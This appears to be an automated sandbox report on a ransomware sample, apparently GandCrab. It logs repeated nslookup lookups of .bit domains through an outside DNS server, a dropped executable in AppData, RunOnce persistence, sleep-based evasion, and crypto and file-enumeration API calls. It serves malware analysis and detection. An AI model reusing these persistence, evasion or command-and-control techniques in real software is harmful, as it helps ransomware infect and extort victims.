Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@127/2@529/0

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00406D90 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,

1_2_00406D90

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00404640 CreateToolhelp32Snapshot,VirtualAlloc,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,Process32NextW,VirtualFree,FindCloseChangeNotification,

1_2_00404640

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5972:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4272:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5500:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4184:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1328:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3880:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1944:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_01
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=66326910ce147b1b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_01

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 9gkAKTWOXp.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

1_2_00407C60

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe

Jump to dropped file

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce qfkhrdewlal	Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe TID: 4584	Thread sleep count: 80 > 30			Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe TID: 4584	Thread sleep time: -800000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Evaded block: after key decision			graph_13-1886
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Evaded block: after key decision			graph_21-1926

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	1_2_00402F50
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	13_2_00402F50
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,	21_2_00402F50

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	1_2_004066F0
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Code function: 1_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	1_2_004064A0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	13_2_004066F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 13_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	13_2_004064A0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_004066F0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	21_2_004066F0
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	Code function: 21_2_004064A0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	21_2_004064A0

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	API call chain: ExitProcess graph end node	graph_1-1626
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	API call chain: ExitProcess graph end node	graph_1-2087
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	API call chain: ExitProcess graph end node	graph_1-1633
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	API call chain: ExitProcess graph end node	graph_1-1615
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	API call chain: ExitProcess graph end node	graph_13-1586
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	API call chain: ExitProcess graph end node	graph_13-1593
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	API call chain: ExitProcess graph end node	graph_13-1613
Source: C:\Users\user\AppData\Roaming\Microsoft\vkspii.exe	API call chain: ExitProcess graph end node	graph_13-1744

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00407C60 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

1_2_00407C60

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe

Code function: 1_2_00405050 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,_memset,lstrlenA,lstrlenA,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,MultiByteToWideChar,GetLastError,VirtualAlloc,VirtualFree,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,

1_2_00405050

Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\9gkAKTWOXp.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
